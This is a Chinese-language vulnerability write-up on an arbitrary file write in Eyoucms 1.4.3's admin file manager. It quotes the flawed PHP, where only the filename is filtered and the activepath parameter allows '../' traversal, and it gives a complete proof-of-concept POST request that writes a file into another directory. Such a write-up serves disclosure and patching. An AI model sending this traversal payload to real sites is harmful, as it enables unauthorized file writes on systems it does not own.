Eyoucms 1.4.3 任意文件写入

一、漏洞简介

可写入html,css,js,txt文件，总体来说比较鸡肋。

二、漏洞影响

Eyoucms 1.4.3

三、复现过程

漏洞分析

漏洞点只对filename进行过滤，而忘了activepath也可以../进行跳转 application/admin/controller/Filemanager.php

  if (IS_POST) {
         $post = input('post.', '', null);
         $content = input('post.content', '', null);
         $filename = !empty($post['filename']) ? trim($post['filename']) : '';
         $content = !empty($content) ? $content : '';
         $activepath = !empty($post['activepath']) ? trim($post['activepath']) : '';

             ... ...

         $r = $this->filemanagerLogic->editFile($filename, $activepath, $content);
         if ($r === true) {
             $this->success('操作成功！', url('Filemanager/index', array('activepath'=>$this->filemanagerLogic->replace_path($activepath, ':', false))));
             exit;
         } else {
             ... ...

跟进editFile函数

application/admin/logic/FilemanagerLogic.php
 public function editFile($filename, $activepath = '', $content = '')
 {
     $fileinfo = pathinfo($filename);// pathinfo获取后缀
     $ext = strtolower($fileinfo['extension']);

     ......

     /*允许编辑的文件类型*/
     if (!in_array($ext, $this->editExt)) { //<<<<<基于白名单，暂时没有想到绕过的方法>>>>>
         return '只允许操作文件类型如下：'.implode('|', $this->editExt);
     }
     /*--end*/

     $filename = str_replace("..", "", $filename);// 仅对filename进行过滤
     $file = $this->baseDir."$activepath/$filename"; // 此处直接拼接产生漏洞
     if (!is_writable(dirname($file))) {
         return "请把模板文件目录设置为可写入权限！";
     }
     if ('css' != $ext) {
         $content = htmlspecialchars_decode($content, ENT_QUOTES);
         $content = preg_replace("/(@)?eval(\s*)(/i", 'intval(', $content);//
         // $content = preg_replace("/?\bphp\b/i", "？ｍｕｍａ", $content);
     }
     $fp = fopen($file, "w");
     fputs($fp, $content);
     fclose($fp);
     return true;
 }

漏洞复现

poc

 POST /eyoucms/login.php?m=admin&c=Filemanager&a=newfile&lang=cn HTTP/1.1
 Host: 127.0.0.1
 User-Agent: Mozilla/5.0 (X11; Linux i686; rv:67.0) Gecko/20100101 Firefox/67.0
 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
 Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
 Accept-Encoding: gzip, deflate
 Content-Type: application/x-www-form-urlencoded
 Content-Length: 94
 Origin: http://127.0.0.1
 Connection: close
 Referer: http://127.0.0.1/eyoucms/login.php?m=admin&c=Filemanager&a=newfile&activepath=%3Atemplate%3Aplugins%3Atest&lang=cn
 Cookie: home_lang=cn; admin_lang=cn; PHPSESSID=h6k34lgf1svcatllongehqqdt0; workspaceParam=index%7CFilemanager; XDEBUG_SESSION=18705
 Upgrade-Insecure-Requests: 1

 activepath=%2Ftemplate%2Fplugins%2Ftest/../../../uploads/tmp&filename=newfile.htm&content=test